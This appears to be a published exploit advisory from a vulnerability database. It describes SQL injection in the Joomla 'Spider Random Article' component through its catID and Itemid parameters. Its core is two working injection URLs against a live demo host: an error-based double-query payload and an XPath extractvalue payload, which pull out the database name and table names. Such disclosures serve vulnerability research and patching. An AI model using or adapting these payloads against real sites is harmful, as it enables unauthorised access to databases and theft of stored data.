Joomla Spider Random Article SQL Injection

2015.03.25
Credit: IndiShell Lab
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################## #Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability #Author : Jagriti Sahu AKA Incredible #Vendor Link : http://demo.web-dorado.com/spider-random-article.html #Date : 22/03/2015 #Discovered at : IndiShell Lab #Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^ ################################################################################################## //////////////////////// /// Overview: //////////////////////// joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters and hence affected by SQL injection vulnerability /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is due to catID and Itemid parameter //////////////// /// POC //// /////////////// SQL Injection in catID parameter ================================= Use error based double query injection with catID parameter Injected Link---> http://demo.web-dorado.com Like error based double query injection for exploiting username ---> http://demo.web-dorado.com/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13 POC Image URL---> http://tinypic.com/view.php?pic=iz9aiu&s=8#.VRG9duESHIU SQL Injection in Itemid parameter ================================= Itemid Parameter is exploitable using xpath injection http://demo.web-dorado.com/index.php?option=com_rand&catID=1&limit=1&style=1&view=articles&format=raw&Itemid=13'and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- - POC Image URL---> http://tinypic.com/view.php?pic=1239z5h&s=8#.VRG97OESHIU ################################################################################################### --==[[Special Thanks to]]==-- # Manish Kishan Tanwar ^_^ #

References:

http://tinypic.com/view.php?pic=1239z5h&s=8#.VRG97OESHIU


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top